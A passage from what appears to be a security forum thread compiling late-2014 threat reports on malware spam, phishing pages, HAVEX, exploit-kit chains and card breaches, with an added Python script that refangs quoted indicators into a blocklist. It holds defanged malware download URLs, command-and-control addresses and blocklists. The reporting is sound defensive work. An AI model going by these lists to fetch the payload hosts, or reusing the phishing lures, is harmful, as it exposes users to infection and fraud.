hxxp ://jasoncurtis .co.uk/js/bin.exe and run from the temp folder... It is known as Dridex, a banking Trojan... Macro malware often relies on social engineering to convince the mark to open a file and disable the default protection. It is not terribly sophisticated but yet it has seen a bit of a revival in recent months with -spam- being the preferred delivery method. The best protection against these types of threats is to be particularly cautious before opening attachments, even if they are ‘classic’ Microsoft Office documents... This holiday season, whether you believe in Santa or not, please be extra cautious with offers that sound too good to be true. The bad guys like to make believe, but we’d rather leave them empty handed or send them off with a lump of coal."
___

Fake 'Postal Notification' SPAM - malicious notification.exe
- http://blog.mxlab.eu/2014/12/24/fake-postal-notification-service-emails-from-fedex-download-malicious-notification-exe/
Dec 24, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Postal Notification Service”. This email is sent from the spoofed address “”Fedex >” <voyeuristicxd@ jackpowerspiritbind .us>” and has the following body:

Screenshot: http://img.blog.mxlab.eu/2014/20141224_fedex.gif

The embedded URL, in our sample hxxp ://appimmobilier .com/notification.exe, will download the 58 kB large file notification.exe. The trojan is known as Win32/TrojanDownloader.Wauchos.AF, UDS:DangerousObject.Multi.Generic or Win32.Trojan.Inject.Auto. At the time of writing, 3 of the 56 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/de425462f1fb95c91edd01ded9337869053c4a09f11c9bec830c542fc5720be8/analysis/

:fear::fear: :mad:
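Added example, not from any of the quoted posts: the Angler EK, 'Tiket alert', 'Remittance Advice' and 'Signature Invoice' write-ups above each end in a recommended blocklist, and all of them are defanged for safe posting ("moorfuse .com", "http ://202.153.35.133 :42463/...", "hxxp ://..."). Before such a list can go into a firewall or DNS sinkhole it has to be refanged and normalised. This Python script does that for a constructed sample made of indicators copied from those posts, separates IPs from domains, and flags which IPs fall inside the ranges the posts suggest blocking wholesale (193.109.68.0/23 and 92.63.88.0/24). The hosts-file output format and the `0.0.0.0` sinkhole address are my choices, not anything the posts specify.

```python
import ipaddress
import re

# Constructed sample: defanged indicator lines copied from the blocklists and
# download URLs quoted in the posts above (spaces before dots/colons, "hxxp").
RAW_IOCS = """
193.109.69.59
holidayspeedsix .biz
http ://202.153.35.133 :42463/2212us12//0/51-SP3/0/
moorfuse .com
http ://185.48.56.133:8080/sstat/lldvs.php
92.63.88.100
92.63.88.106
http ://Lichtblick-tiere .de/js/bin.exe
sunfung .hk
hxxp ://jasoncurtis .co.uk/js/bin.exe
"""


def refang(line):
    """Undo the defanging conventions used in the quoted posts."""
    s = line.strip().strip('"')
    s = re.sub(r"^hxxps?", lambda m: m.group(0).replace("xx", "tt"), s, flags=re.I)
    s = re.sub(r"\s*://\s*", "://", s)   # "http ://host"  -> "http://host"
    s = re.sub(r"\s+\.", ".", s)         # "moorfuse .com" -> "moorfuse.com"
    s = re.sub(r"\s+:", ":", s)          # "host :42463"   -> "host:42463"
    return s


def extract_host(ioc):
    """Return the bare host (IP or domain, lowercased) from a refanged IoC."""
    s = re.sub(r"^[a-z]+://", "", ioc, flags=re.I)   # drop scheme
    s = s.split("/", 1)[0]                             # drop path
    s = s.split(":", 1)[0]                             # drop port
    return s.lower()


def build_blocklist(raw, watched_ranges=()):
    """Split indicators into sorted IP and domain lists. IPs that fall inside
    one of watched_ranges are also reported per range, so the reader can
    decide whether blocking the whole range (as the posts suggest) is wanted."""
    ips, domains, in_ranges = set(), set(), {}
    nets = [ipaddress.ip_network(r) for r in watched_ranges]
    for line in raw.splitlines():
        if not line.strip():
            continue
        host = extract_host(refang(line))
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            domains.add(host)          # not an address, treat as a domain
            continue
        ips.add(str(ip))
        for net in nets:
            if ip in net:
                in_ranges.setdefault(str(net), set()).add(str(ip))
    return sorted(ips), sorted(domains), in_ranges


def to_hosts_sinkhole(domains):
    """Render domains as hosts-file lines pointing at 0.0.0.0."""
    return "\n".join("0.0.0.0 %s" % d for d in domains)


if __name__ == "__main__":
    ips, domains, hits = build_blocklist(RAW_IOCS, ["92.63.88.0/24", "193.109.68.0/23"])
    print("IPs:", ips)
    print("Domains:", domains)
    print("Range hits:", hits)
    print(to_hosts_sinkhole(domains))
```

The range check is the useful part: the 'Remittance Advice' post notes two downloaders in 92.63.88.0/24 and the Angler post suggests 193.109.68.0/23 can go entirely; seeing which of your collected IPs cluster in one range is how you decide whether a single CIDR rule replaces several host rules.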

AplusWebMaster
2014-12-29, 16:05
FYI...

Phish - "Your Netflix Account Has Been Suspeded"
- http://blog.mxlab.eu/2014/12/29/phishing-email-your-netflix-account-has-been-suspeded/
Dec 29, 2014 - "... intercepted a phishing campaign by email with the subject “Your Netflix Account Has Been Suspeded [#654789]”. This email is sent from the spoofed address “”secure@ netflix .ssl .co.uk” <secure@ netflix .ssl .co.uk>” and has the following body:

Screenshot: http://img.blog.mxlab.eu/2014/20141229_netflix_1.gif

In our sample, the URL takes us to the phishing site located at hxxp ://netflix-validation- uk .co .uk/~netflix/authcode.22e2839f6ea44972845f1e0b02f397ba/email_identifier=71a605276e146b93e52b0c1bfb98ade285c337b0a6b7e5f3f560fd5bb11f1d1c/d0446fac4ba6feceb507af17e1b0bca8/Login.php
This shows us an identical copy of the official Netflix login page. Screenshot of the member login form on the phishing web site:
> http://img.blog.mxlab.eu/2014/20141229_netflix_2.gif
After submitting the login and password, the phishing process begins by asking to fill in our billing information.
> http://img.blog.mxlab.eu/2014/20141229_netflix_3.gif
Followed by filling in our credit card details:
> http://img.blog.mxlab.eu/2014/20141229_netflix_4.gif
Our account seems to be updated and we can continue:
> http://img.blog.mxlab.eu/2014/20141229_netflix_5.gif
…. straight to the official Netflix login site:
> http://img.blog.mxlab.eu/2014/20141229_netflix_6.gif "
___

64-bit Version of HAVEX seen - ICS
- http://blog.trendmicro.com/trendlabs-security-intelligence/64-bit-version-of-havex-spotted/
Dec 29, 2014 - "The remote access tool (RAT) HAVEX* became the focus of the security industry after it was discovered to have played a major role in a campaign targeting industrial control systems (ICS). While observing HAVEX detections (known by different vendors as Dragonfly, Energetic Bear, and Crouching Yeti), we noticed something interesting. The Dragonfly campaign was previously believed to be compatible only with 32-bit versions, as most mission critical systems would most likely be running Windows XP, which has since been listed as end of support. In contrast, we came across two interesting infections running on Windows 7 systems. First 64-bit HAVEX Sighting: Based on our analysis (seen in the chain below), a file called TMPprovider023.dll, detected as BKDR64_HAVEX.A, was found, which creates several files in the file system. It should be noted that TMPprovider0<2-digit version number>.dll is a known indicator of HAVEX and is the component of this threat that interacts with the command-and-control (C&C) servers to perform downloads or receive execution commands associated with it.
> File installation chain: http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/64havex1.jpg
... we’re seeing three indicators of BKDR_HAVEX:
- The file TMPProvider023.dll, as indicated above, with the number indicating the version of this HAVEX RAT (v023)
- A dropped file named 34CD.tmp.dll, detected as BKDR_HAVEX.SM. At this point, the file is being repeatedly detected and quarantined by the installed Trend Micro product. This was later found out to be version 29 or v029 of HAVEX.
- C&C communication from the host and back
... a 64-bit file, was upgraded to a 32-bit v029 HAVEX RAT. This now brings us to four files that seem to be interrelated in one single infection, as seen below:
File name                  SHA1                                      Compile Date  Architecture
%TEMP%\TMPprovider023.dll  997C0EDC9E8E67FA0C0BC88D6FDEA512DD8F7277  2012-10-03    AMD64
%TEMP%\34CD.tmp.dll        CF5755D167077C1F8DEEDDEAFEBEA0982BEED718  2013-04-30    I386
%TEMP%\734.tmp.dll         BFDDB455643675B1943D4E33805D6FD6884D592F  2013-08-16    I386
%TEMP%\4F2.tmp.dll         8B634C47087CF3F268AB7EBFB6F7FBCFE77D1007  2013-06-27    I386
... In this particular infection, the v023 HAVEX file was using the same command-and-control server as that of the v029 HAVEX file... Currently, we have seen at least four IP addresses communicating to the command-and-control server, two of which have exhibited the behavior of upgrading the version of the C&C module of the HAVEX RAT... the HAVEX RAT has gone through several iterations—used in campaigns with ICS/SCADA and even pharmaceutical targets, nothing prevents it from being used again and again. ICS operators have to take note that the structure of the HAVEX binaries resemble much of what we see in common Windows malware – more so now that we’ve seen Windows 7 64-bit infections. It is thereby important to validate software being installed on endpoints within the environment, and to frequently monitor HTTP traffic..."
(More detail at the trendmicro URL at the top of this post.)
* Havex infection (ICS)/SCADA systems chain:
> http://about-threats.trendmicro.com/resources/images/HAVEX_2.jpg

:mad: :fear:

AplusWebMaster
2014-12-30, 23:01
FYI...

'Worm' removed at hacked South Korea nuclear operator
- http://www.reuters.com/article/2014/12/30/us-nuclear-southkorea-cybersecurity-idUSKBN0K80J620141230
Dec 30, 2014 - "South Korean authorities have found evidence that a low-risk computer "worm" had been removed from devices connected to some nuclear plant control systems, but no harmful virus was found in reactor controls threatened by a hacker. Korea Hydro & Nuclear Power Co Ltd said it would beef up cyber security by hiring more IT security experts and forming an oversight committee, as it came in for fresh criticism from lawmakers following recent hacks against its headquarters. The nuclear operator, part of state-run utility Korea Electric Power Corp, said earlier this month that non-critical data had been stolen from its systems, while a hacker threatened in Twitter messages to close three reactors. The control systems of the two complexes housing those reactors had not been exposed to any malignant virus, Seoul's energy ministry and nuclear watchdog said in a joint statement on Tuesday, adding the systems were -inaccessible- from external networks. The nuclear plant operator said on Tuesday it was increasing the number of staff devoted to cyber security from 53 to around 70, and would set up a committee of internal and external experts to oversee security..."
___

Target hacks hit OneStopParking .com
- http://krebsonsecurity.com/2014/12/target-hackers-hit-onestopparking-com/
Dec 30, 2014 - "Parking services have taken a beating this year at the hands of hackers bent on stealing credit and debit card data. This week’s victim — onestopparking .com — comes compliments of the same organized crime gang thought to be responsible for stealing tens of millions of card numbers from shoppers at Target and Home Depot. Late last week, the cybercrime shop best known for being the first to sell cards stolen in the Target and Home Depot breach moved a new batch of cards taken from an unknown online merchant. Several banks contacted by KrebsOnSecurity acquired cards from this batch, and determined that all had one thing in common: They’d all been used at onestopparking .com, a Florence, Ky. based company that provides low-cost parking services at airport hotels and seaports throughout the United States. Contacted about the suspicious activity that banks have traced back to onestopparking .com, Amer Ghanem, the site’s manager, said the company began receiving complaints from customers about a week before Christmas...
Cards from the “Solidus” base at Rescator map back to One Stop Parking
> http://krebsonsecurity.com/wp-content/uploads/2014/12/solidus-600x291.png
This was the second time in as many weeks that this cybercrime shop –Rescator[dot]cm — has put up for sale a batch of credit cards stolen from an online parking service: On Dec. 16, KrebsOnSecurity reported that the same shop was selling cards stolen from Park-n-Fly, a competing airport parking reservation service. Sometime over the past few days, Park-n-Fly announced it was suspending its online service... a security update posted on the company’s site*. Park ‘N Fly noted that it is still taking reservations over the phone... Last month, SP Plus — a Chicago-based parking facility provider — said** payment systems at 17 parking garages in Chicago, Philadelphia and Seattle were -hacked- to capture credit card data after thieves installed malware to access credit card data from a remote location. Card data stolen from those SP+ locations ended up for sale on a competing cybercrime -store- called Goodshop. In Missouri, the St. Louis Parking Company recently disclosed*** that it learned of a breach involving card data -stolen- from its Union Station Parking facility between Oct. 6, 2014 and Oct. 31, 2014."
* http://www.pnf.com/security-update/

** http://www.qconline.com/news/illinois/parking-garages-hacked-for-credit-card-data/article_dabd4256-2aa2-5005-b09e-30feecb95eb1.html

*** http://stlouisparking.com/press-release/
___

Instagram Profile Deletion Hoax
- https://blog.malwarebytes.org/fraud-scam/2014/12/january-1st-instagram-profile-deletion-hoax/
Dec 30, 2014 - "... accounts on Instagram claiming a mass purge is coming on January 1, 2015 unless your account is “verified”, with the aid of a so-called Verification Arrow. Profiles such as the one below (with 110k followers at time of writing) are receiving a fair amount of traction with between 5,000-8,000 likes per image (I got 6 for a picture of a cat once), stating:

If your account doesn't have a picture of an arrow next to it then it's in the process of being deleted. To get your arrow, please follow the instructions below
1) Follow @verifyingarrows
2) Repost our photo
3) Tag @verifyingarrows
4) Hashtag #verifyingarrows
Screenshot: https://blog.malwarebytes.org/wp-content/uploads/2014/12/instaarrow2.jpg
Here’s a similar profile – now deleted – which managed to grab 245k followers before being banned itself:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/instaarrow1.jpg
The “arrow” in question appears to be nothing more than a drop down box on profiles which suggests accounts similar to the one you’re looking at. It has -nothing- to do with profile verification or dodging deletion waves. Regardless, panicked Instagram users appear to be jumping on the ban(d)wagon and doing what they can to fend off a profile extinction event that is never going to arrive. In terms of what the ultimate end game is with all of this, it’s a case of wait and see for the time being. This is either just a -hoax- for the sake of it, or maybe the accounts asking people to bolster their visibility on Instagram will suddenly start selling something come the New Year. Whatever they’re up to, you can safely -ignore- these profiles and carry on taking selfies and pictures of sandwiches, with or without a filter."
___

Apple Store 'Transaction Cancellation Form' Phish...
- http://www.hoax-slayer.com/apple-store-transaction-cancellation-phishing-scam.shtml
Dec 30, 2014 - "According to this email, which purports to be from Apple, you have purchased a TomTom from the Apple Store (GPS car navigation system). The email explains that, if you did not authorise the TomTom purchase, you should click-a-link-to-access an Apple Store Transaction Cancellation Form. Supposedly, by filling in the form, the purchase will be cancelled and you will receive a full refund. However, the email is -NOT- from Apple and the claim that you have bought a Tom Tom is just a ruse designed to trick you into clicking the 'cancel' link.
Clicking the link takes you to a website that hosts a -fake- Apple Store 'Cancellation' form. The -fake- form asks you to provide name and contact details as well as your credit card and banking information.
Clicking the 'Cancel Transaction' button will send all of your information to criminals who can then use it to commit financial -fraud- and identity theft.
The scammers bank on the fact that at least a few recipients of the email will be -panicked- into clicking the link and supplying their information in the mistaken belief that someone has made fraudulent purchases in their name."
> http://www.hoax-slayer.com/images/apple-store-transaction-cancellation-phishing-scam-1.jpg

:fear::fear: :mad:

AplusWebMaster
2014-12-31, 21:59
FYI...

'NetGuard Toolbar' SPAM
- http://blog.dynamoo.com/2014/12/netguard-toolbar-ngcmpcom-spam.html
31 Dec 2014 - "Sometimes a spam comes through and it isn't immediately obvious what they are trying to do:
From: Brad Lorien [bclorien@ ngcmp .com]
Date: 31 December 2014 at 01:12
Subject: Real estate (12/30/2014)
Our company reaches an online community of almost 41 million people,
who are mostly US and Canadian based. We have the ability to present
our nearly 41 million strong network with a best, first choice when
they are looking online for what your company does.
We are seeking a preferred choice to send our people who are looking
for real estate in Abilene and surrounding markets.
I’m in the office weekdays from 9:00 AM to 5:00 PM Pacific time.
Best regards,
Brad Lorien
Network Specialist, SPS EServices
Phone: (877) 489.2929, ext. 64

There is no link or attachment in the email. So presumably the spammer is soliciting replies to the email address bclorien@ ngcmp .com which is a valid address. The domain ngcmp.com uses a mail server mail.ngcmp .com to receive email messages, hosted on 38.71.66.127 (PSInet / Virtual Empire, US)... the spam was sent via a relay at 38.71.66.126 which is one IP different from the server handling incoming mail, which pretty much firmly identifies that whoever controls the ngcmp .com domain is actually sending the spam. The mail headers also identify the originating IP as well as the relay, which is a Verizon Wireless customer at 75.215.49.211, possibly someone sending spam using throwaway cell phones to avoid being traced. An examination of those two PSInet addresses shows the following domains are associated with them:
ncmp .co
ngmp .co
ngcmp .com
ng-portal .com
ngcmp .net
ng-central .net
luxebagscloset .com
reviewwordofmouth .com
All of these domains have -anonymous- WHOIS details, but you can see that there is a common pattern here. I don't recommend that you visit spam sites... I did in this case to see what it was about:
> https://2.bp.blogspot.com/-HeHlNoeUd6U/VKPab3DijjI/AAAAAAAAGEU/GhzY1GyW6ok/s1600/netguard.png
This is basically -adware- . Going back to the original spam message, these "41 million people" are presumably suckers who have downloaded this crap, and NG Systems are busy spamming out to find more low-life advertisers to fill up their network... Predictably, there seems to be -no- such corporation as "NG Systems", but if you download the Toolbar it turns out it is digitally -signed- by a company called "IP Marketing Concepts, Inc." ... The executable itself is tagged by only one AV engine* as malicious, but VirusTotal does note that it looks like a PUA. Malwr notes** that individual components appear to be Russian in origin. So all in all, this spam is being sent out by a company that goes a very, very long way to disguise its origins..."
* https://www.virustotal.com/en/file/75bd42a0ce57389cdbbcc0db9c0221e041a3a56612068a02da8425a5d860b132/analysis/1420024818/

** https://malwr.com/analysis/ZjdjZDYzMzVlZTkzNDAwM2E2Y2U1NzRjNTUyNjhmNjM/
___

PUP borrows tricks from malware authors
- https://blog.malwarebytes.org/fraud-scam/2014/12/potentially-unwanted-program-borrows-tricks-from-malware-authors/
Dec 31, 2014 - "... These days it is getting harder and harder to download a program from its official source, in its original format, without additional pieces of software bundled to it:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/back-965x395.png
Companies specializing in so-called ‘download assistants’ or ‘download managers’ claim that they:
Provide a value added service to users by suggesting additional programs tailored to the users’ needs.
Offer a way for software manufacturers to monetize their free applications.
Let’s have a look for ourselves by checking an installer for the Adobe Flash Player. The details are as follows:
Name: adobe_flash_setup.exe
Size: 809.0 KB
MD5: d549def7dd9006954839a187304e3835
imphash: 884310b1928934402ea6fec1dbd3cf5e
Out of the box: The first thing we noticed was that the program behaves differently depending on whether it is launched on a real physical machine or a Virtual Machine:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/schema-1024x782.png
In a VM such as VirtualBox, the installer skips all the bundled offers and goes straight for the Flash Player... There might be a few reasons for this:
To avoid unnecessary impressions and installs on ‘fake’ systems that would skew metrics.
To appear as a ‘clean’ installer when installed on automated sandboxes or by hand from security researchers.
Anti-vm behavior does not necessarily mean that the application is malicious, but it -is- something that many malware authors use... The certificate details show that said company is located in Tel Aviv, Israel and a VirusTotal scan* hints at a connection with InstallCore, a “digital content delivery platform”... There are also various other offers bundled in this installer, courtesy of a “distributer” called Entarion Ltd., with an “address” conveniently located in Cyprus, well-known as a safe haven for offshore companies... Malwarebytes’ criteria for listing a program as a PUP can be viewed here**. The list is pretty thorough and will most likely continue to evolve as PUP makers diversify their operations. Consumers should be able to make educated choices rather than being misled down a path that they didn’t intend to take..."
* https://www.virustotal.com/en/file/7ecf874ceba964fdc32e989e7c706b3f3e28cbfa906c7f371a24cbae11276d0b/analysis/

** https://www.malwarebytes.org/pup/

:fear: :mad:

AplusWebMaster
2015-01-02, 02:35
FYI...

Evil network: 217.71.50.0/24 / ELTAKABEL-AS / TXTV d.o.o. Tuzla / aadeno@ inet .ba
- http://blog.dynamoo.com/2014/12/evil-network-2177150024-eltakabel-as.html
31 Dec 2014 - "This post by Brian Krebs* drew my attention to a block of Bosnian IP addresses with an unusually bad reputation. The first clue is given by Google's safe browsing diagnostics**..
** http://www.google.com/safebrowsing/diagnostic?site=AS:198252
Some of those domains rang a bell to do with recent malware attacks. One odd thing that struck me was that this is a sparsely populated but relatively large*** collection of IP addresses that appear to be mostly allocated to broadband customers rather than web hosts. An investigation into what was lurking in this AS highlighted a problem block of 217.71.50.0/24 which contains very -many- bad sites...
*** http://bgp.he.net/AS198252#_prefixes
... appears to be a block suballocated to someone using the email address aadeno@ inet .ba. I took a look at the sites hosted in this /24... There are 37 malicious websites (identified by Google) out of 185 that I found in this network range. The usual level of badness tends to be around 1%, but here it is 20%. Looking at the domains, it appears that there is nothing at all of value here and you can probably count them all as malicious.
Recommended blocklist:
217.71.50.0/24 ..."
(Long list at the dynamoo URL at the top.)

* http://krebsonsecurity.com/2014/12/lizard-kids-a-long-trail-of-fail/

:fear::fear: :mad:

AplusWebMaster
2015-01-02, 15:00
FYI...

binarysmoney .com / clickmoneys .com / thinkedmoney .com "job" SPAM
- http://blog.dynamoo.com/2015/01/binarysmoneycom-clickmoneyscom.html
2 Jan 2015 - "I've been plagued with these for the past few days:
Date: 2 January 2015 at 11:02
Subject: response
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
We cooperate with different countries and currently we have many clients in the world.
Part-time and full-time employment are both currently important.
We offer a flat wage from $1500 up to $5000 per month.
The job offers a good salary so, interested candidates please registration on the our site: www .binarysmoney .com
Attention! Accept applications only on this and next week.
Respectively submitted
Personnel department

Subject lines include:
New employment opportunities
Staff Wanted
Employment invitation
new job
New job offer
Interesting Job
response
Spamvertised sites seen so far are binarysmoney .com, clickmoneys .com and thinkedmoney .com, all multihomed on the following IPs:
46.108.40.76 (Adnet Telecom / "Oancea Mihai Gabriel Intreprindere Individuala", Romania)
201.215.67.43 (VTR Banda Ancha S.A., Chile)
31.210.63.94 (Hosting Internet Hizmetleri Sanayi Ve Ticaret Anonim Sirketi, Turkey)
Another site hosted on these IPs is moneyproff .com. All the domains have apparently -fake- WHOIS details.
It looks like a money mule spam, but in fact it leads to some binary options trading crap.
> http://2.bp.blogspot.com/-91ORuyJxnpU/VKZ0LXPbKMI/AAAAAAAAGFA/cngzfgKroWg/s1600/binary-options.jpg
... that's just a Shutterstock stock photo that is pretty widely used on the web. In fact, everything about this whole thing is a cookie-cutter site with text and images copied from elsewhere. Binary options are a haven for scammers, and my opinion is that this is such a -scam- given the spammy promotion and hidden identity of the operators. I would recommend that you avoid this and also block traffic to the following IPs and domains:
46.108.40.76
201.215.67.43
31.210.63.94
clickmoneys .com
thinkedmoney .com
binarysmoney .com
moneyproff .com"

:fear::fear: :mad:

AplusWebMaster
2015-01-03, 19:31
FYI...

Fake 'Thank you' SPAM - malware
- http://myonlinesecurity.co.uk/thank-buying-acrobat-xi-pro-malware/
3 Jan 2015 - "'Thank you for buying from Acrobat XI Pro' pretending to come from Plimus Sales <receipt@ plimus .com> with a link to a malicious website is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Plimus is a genuine affiliate marketing service/reseller/payment gateway for many software companies including Adobe. If you look carefully at the email, you can see the links are to IPLIMUS -not- plimus...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Thank-you-for-buying-from-Acrobat-XI-Pr.jpg

3 January 2015: adbx1pro.exe - Current Virus total detections: 25/56*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8e06e0f9ceca9896713b2d54b6f3d05a981ed370a39f4bd8560df6ab369d3fb5/analysis/1420298571/

:fear::fear: :mad:

AplusWebMaster
2015-01-05, 15:53
FYI...

Phish - 'Tesco Important Notification' ...
- http://myonlinesecurity.co.uk/tesco-important-notification-phishing/
5 Jan 2015 - "'Tesco Important Notification' pretending to come from Tesco .com offering you -free- Tesco vouchers is one of the latest -phish- attempts to steal your Tesco bank Account and your other personal details. This one wants your personal details, Tesco log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well. If you are unwise enough to fill in the personal details and security questions, there is a very high likelihood that information could be used to compromise any other account or log in ANYWHERE on the net... don’t ever click the link in the email. If you do it will lead you to a website that looks at first glance like the genuine Tesco -bank- website but you can clearly see in the address bar, that it is -fake- ... Some versions of this -phish- will ask you fill in the html ( webpage) form that comes attached to the email...

If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1-1024x606.jpg

Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2-1024x534.jpg

After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3-1024x746.jpg

Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4-1024x625.jpg

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straightforward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."

:fear: :mad: :fear:

AplusWebMaster
2015-01-06, 15:26
FYI...

hqq .tv serving up Exploit kit (via Digital Ocean and Choopa)
- http://blog.dynamoo.com/2015/01/hqqtv-serving-up-exploit-kit-via.html
6 Jan 2014 - "... here's an infection chain starting from a scummy-looking video streaming site called cine-stream .net. I do not recommend visiting any of the sites labelled [donotclick]
Step 1
[donotclick]cine-stream .net/1609-le-pre-nol-est-une-ordure-en-streaming.html
89.248.170.206 (Ecatel Ltd, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420561240827
Step 2
[donotclick]hqq .tv/player/embed_player.php?vid=7SO84O65X5SM&autoplay=no
199.83.130.198 (Incapsula, US)
Step 3
[donotclick]agroristaler .info/dasimotulpes16.html
128.199.48.44 (Digital Ocean, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420561209263
Step 4
[donotclick]aflesministal .info/chat.html
178.62.147.144 (Digital Ocean, Netherlands)
128.199.52.108 (Digital Ocean, Netherlands)
Step 5
[donotclick]pohfefungie .co.vu/VUZQBUgAAgtAGlc.html
[donotclick]eixaaweexum .co.vu/VxFVBkgAAgtAGlc.html
108.61.165.69 (Choopa LLC / Game Servers, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420560803160
The Digital Ocean and Choopa IPs host several apparently malicious domains:
108.61.165.69
eixaaweexum .co.vu
ienaakeoke .co.vu
weswalkers .co.vu
pohfefungie .co.vu
vieleevethu .co.vu
178.62.147.144
128.199.52.108
sebitibir .info
abrisgalor .info
aflesministal .info
128.199.48.44
abibruget .info
alsonutird .info
fiflakutir .info
fistikopor .info
agroristaler .info
poliloparatoser .info
In my opinion, .co.vu domains are often bad news and are good candidates for blocking. In the mean time I would recommend the following -minimum- blocklist:
108.61.165.69
178.62.147.144
128.199.52.108
128.199.48.44 "
___

Fake 'National Payments Centre' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-sgbd-national-payments.html
6 Jan 2015 - "This -fake- financial spam has a malicious payload:
Date: 6 January 2015 at 08:56
Subject: This is your Remittance Advice #ATS29858
DO NOT REPLY TO THIS EMAIL ADDRESS
Please find attached your remittance advice from Saint Gobain UK.
For any queries relating to this remittance please notify the Payment Enquiry Team on 01484913947
Regards,
SGBD National Payments Centre

Note that this email is a forgery. Saint Gobain UK are -not- sending the spam, nor have their systems been compromised in any way. Instead, criminals are using a -botnet- to spam out malicious Excel documents. Each email has a different reference number, and the attachment file name matches. The telephone number is randomly generated in each case, using a dialling code of 01484 which is Huddersfield (in the UK). There will probably be a lot of confused people in Huddersfield at the moment.
There are actually four different versions of the -malicious- Excel file, none of which are detected by anti-virus vendors [1] [2] [3] [4] containing four different but similar macros... which then download a component from one of the following locations:
http ://213.174.162.126:8080 /mans/pops.php
http ://194.28.139.100:8080 /mans/pops.php
http ://206.72.192.15:8080 /mans/pops.php
http ://213.9.95.58:8080 /mans/pops.php
This file is downloaded as test.exe and it is then saved as %TEMP%\1V2MUY2XWYSFXQ.exe. It has a VirusTotal detection rate of just 3/48*. That report shows that the malware then connects to the following URLs:
http ://194.146.136.1:8080/
http ://179.43.141.164/X9BMtSKOfaz/e&WGWM+o%3D_c%26%248/InRRqJL~L
http ://179.43.141.164/TiHlXjsnCOo8%2C/fS%24P/VZFrel2ih%2Dlv+%26aTn
http ://179.43.141.164/suELl1XsT%2CFX.k%26z4./sn%3F=/%3Ffw/HFBN@8J
http ://179.43.141.164/fhmhi/igm/c&@%7E%2Dj.==m~cg_%2B%2C%3Daggs.%2Dkgm%26$~@fk@g/a%2Cgm+lkb%2D.~$kh/
194.146.136.1 is allocated to PE "Filipets Igor Victorovych" in Ukraine. 179.43.141.164 is Private Layer Inc in Panama. I would definitely recommend blocking them and possibly the entire /24s in which they are hosted. The Malwr report shows no activity, indicating that it is hardened against analysis.
Recommended blocklist:
194.146.136.1
179.43.141.164
213.174.162.126
194.28.139.100
206.72.192.15
213.9.95.58 "
1] https://www.virustotal.com/en/file/71fbb660463658b2b4d1da37286d66eba65c9732bd2c1ce1a4834071eca03451/analysis/1420539739/

2] https://www.virustotal.com/en/file/48ae571eb549056c3f6ff192c3dac181d3c9ef1f78b6ea8cca0baefdcacf0bc7/analysis/1420539746/

3] https://www.virustotal.com/en/file/11a175b70117924b4b7b547277e283408bb2777db0835c774352d4344bbea86f/analysis/1420539753/

4] https://www.virustotal.com/en/file/fa4b67f24b7dfda876fbc9fd9fd127048c5799fd005f07a904fa02cff04e8efd/analysis/1420539759/

* https://www.virustotal.com/en/file/eca46cc3a36df9c32dbe967298ddc1f6ee6790179a87b4e17d1d9b0e4bbbf87c/analysis/1420540311/

- http://myonlinesecurity.co.uk/sgbd-national-payments-centre-remittance-advice-excel-xls-malware/
6 Jan 2015
___

Fake 'PAYMENT ADVICE' malware SPAM
- http://blog.dynamoo.com/2015/01/payment-advice-06-jan-2015-malware-spam.html
6 Jan 2015 - "This spam has a malicious attachment:
From: Celeste , Senior Accountant
Date: 6 January 2015 at 10:13
Subject: PAYMENT ADVICE 06-JAN-2015
Dear all,
Payment has been made to you in amount GBP 18898,28 by BACS.
See attachment.
Regards,
Celeste
Senior Accountant

I have only seen one sample so far, with a document BACS092459_473.doc which has a VirusTotal detection rate of 0/56* and which contains this macro... which attempts to download an additional component from:
http ://206.72.192.15:8080 /mans/pops.php
This is exactly the same file as seen in this parallel spam run** today and it has the same characteristics."
* https://www.virustotal.com/en/file/56d6b5053ad57f94ab73ff3b57a3aed5cf336f1600986e8a3634f2840602e215/analysis/1420543064/

** http://blog.dynamoo.com/2015/01/malware-spam-sgbd-national-payments.html

- http://myonlinesecurity.co.uk/senior-accountant-payment-advice-06-jan-2015-word-doc-malware/
6 Jan 2015
___

MS warns of new malware attacks w/ Office docs
- http://www.techworm.net/2015/01/microsoft-warns-new-malware-attacks-office-documents.html
Jan 5, 2015 - "Microsoft has warned its Microsoft Office users of a significant rise in malware attacks through macros in Excel and Word programs. In a report published on its blog*, Microsoft says that there is more than a threefold jump in the malware campaigns spreading two different Trojan downloaders. These Trojan downloaders arrive in -emails- masquerading as orders or invoices. The malware is being spread through spam emails containing the following subject lines, according to Microsoft:
